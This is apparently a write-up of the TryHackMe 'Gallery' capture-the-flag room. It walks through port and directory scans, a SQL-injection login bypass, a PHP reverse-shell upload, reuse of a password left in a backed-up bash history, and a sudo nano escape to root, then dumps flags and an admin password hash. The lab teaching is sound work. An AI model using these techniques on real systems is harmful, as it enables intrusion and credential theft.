Gallery (SQLI, Backup, nano)

First, we need to enumerate using nmap and rustscan.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/gallery  
╰─➤  nmap -A 10.10.145.252 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 09:22 +0630
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.60% done; ETC: 09:24 (0:00:08 remaining)
Nmap scan report for 10.10.145.252
Host is up (0.39s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE        VERSION
80/tcp   open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open     http           Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.66 seconds

Port 80

When you browse to http://10.10.145.252/, you will see default webpage. Let's enumerate some sub directories.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/gallery  
╰─➤  gobuster -u http://10.10.145.252/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.145.252/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt,html,sh
[+] Timeout      : 10s
=====================================================
2022/04/24 09:25:33 Starting gobuster
=====================================================
/index.html (Status: 200)
/gallery (Status: 301)

Port 8080

Wen you browser to http://10.10.145.252:8080/, you will find login page http://10.10.145.252/gallery/login.php.

You can simply bypass using through sqli admin' or '1'='1. And then you will find a dashboard.

In Albums directory, we can upload a image. But we only upload PHP reverse shell file. And then click it.

In netcat, we got a connection.

User

Spawning a TTY Shell

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/sh")'

We can't read user.txt. Becasue we are www-data user.

$ ls -al
ls -al
total 44
drwxr-xr-x 6 mike mike 4096 Aug 25  2021 .
drwxr-xr-x 4 root root 4096 May 20  2021 ..
-rw------- 1 mike mike  135 May 24  2021 .bash_history
-rw-r--r-- 1 mike mike  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike 3772 May 20  2021 .bashrc
drwx------ 3 mike mike 4096 May 20  2021 .gnupg
drwxrwxr-x 3 mike mike 4096 Aug 25  2021 .local
-rw-r--r-- 1 mike mike  807 Apr  4  2018 .profile
drwx------ 2 mike mike 4096 May 24  2021 documents
drwx------ 2 mike mike 4096 May 24  2021 images
-rwx------ 1 mike mike   32 May 14  2021 user.txt
$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

In /var/backups directory, we found some interesting file.

$ ls -al /var/backups
ls -al /var/backups
total 60
drwxr-xr-x  3 root root  4096 Apr 24 02:51 .
drwxr-xr-x 13 root root  4096 May 20  2021 ..
-rw-r--r--  1 root root 34789 Feb 12 21:40 apt.extended_states.0
-rw-r--r--  1 root root  3748 Aug 25  2021 apt.extended_states.1.gz
-rw-r--r--  1 root root  3516 May 21  2021 apt.extended_states.2.gz
-rw-r--r--  1 root root  3575 May 20  2021 apt.extended_states.3.gz
drwxr-xr-x  5 root root  4096 May 24  2021 mike_home_backup
$ 

Change to this directory and read .bash_history file.

$ cd /var/backups/mike_home_backup
cd /var/backups/mike_home_backup
$ ls
ls
documents  images
$ ls -al
ls -al
total 36
drwxr-xr-x 5 root root 4096 May 24  2021 .
drwxr-xr-x 3 root root 4096 Apr 24 02:51 ..
-rwxr-xr-x 1 root root  135 May 24  2021 .bash_history
-rwxr-xr-x 1 root root  220 May 24  2021 .bash_logout
-rwxr-xr-x 1 root root 3772 May 24  2021 .bashrc
drwxr-xr-x 3 root root 4096 May 24  2021 .gnupg
-rwxr-xr-x 1 root root  807 May 24  2021 .profile
drwxr-xr-x 2 root root 4096 May 24  2021 documents
drwxr-xr-x 2 root root 4096 May 24  2021 images
$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb3stpassw0rdbr0xx
clear
sudo -l
exit

It can be mike user password, so we change to mike user. We successfully change to mike user.

$ su mike
su mike
Password: b3stpassw0rdbr0xx

mike@gallery:/var/backups/mike_home_backup$ 

Read the user flag.

mike@gallery:/var/backups/mike_home_backup$ cd /home/mike
cd /home/mike
mike@gallery:~$ cat user.txt
cat user.txt
THM{af05cd30bfed67849befd546ef}

Root

Check privileges with sudo -l, you will find something.

mike@gallery:~$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:~$ 

/opt/rootkit.sh

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

Bypass it.

sudo /bin/bash /opt/rootkit.sh
^R^X
reset; sh 1>&0 2>&0

I can't bypass at terminal and get many error. So, I will create a stable shell and bypass it.

Read the root flag.

# whoami
root
# cat /root/root.txt
THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}

Read mysql data.

# mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 82
Server version: 10.1.48-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gallery_db         |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)

MariaDB [(none)]> use gallery_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [gallery_db]> show tables;
+----------------------+
| Tables_in_gallery_db |
+----------------------+
| album_list           |
| images               |
| system_info          |
| users                |
+----------------------+
4 rows in set (0.00 sec)

MariaDB [gallery_db]> select * from users;
+----+--------------+----------+----------+----------------------------------+------------------------------------------+------------+------+---------------------+---------------------+
| id | firstname    | lastname | username | password                         | avatar                                   | last_login | type | date_added          | date_updated        |
+----+--------------+----------+----------+----------------------------------+------------------------------------------+------------+------+---------------------+---------------------+
|  1 | Adminstrator | Admin    | admin    | a228b12a08b6527e7978cbe5d914531c | uploads/1629883080_1624240500_avatar.png | NULL       |    1 | 2021-01-20 14:02:37 | 2021-08-25 09:18:12 |
+----+--------------+----------+----------+----------------------------------+------------------------------------------+------------+------+---------------------+---------------------+
1 row in set (0.01 sec)

MariaDB [gallery_db]>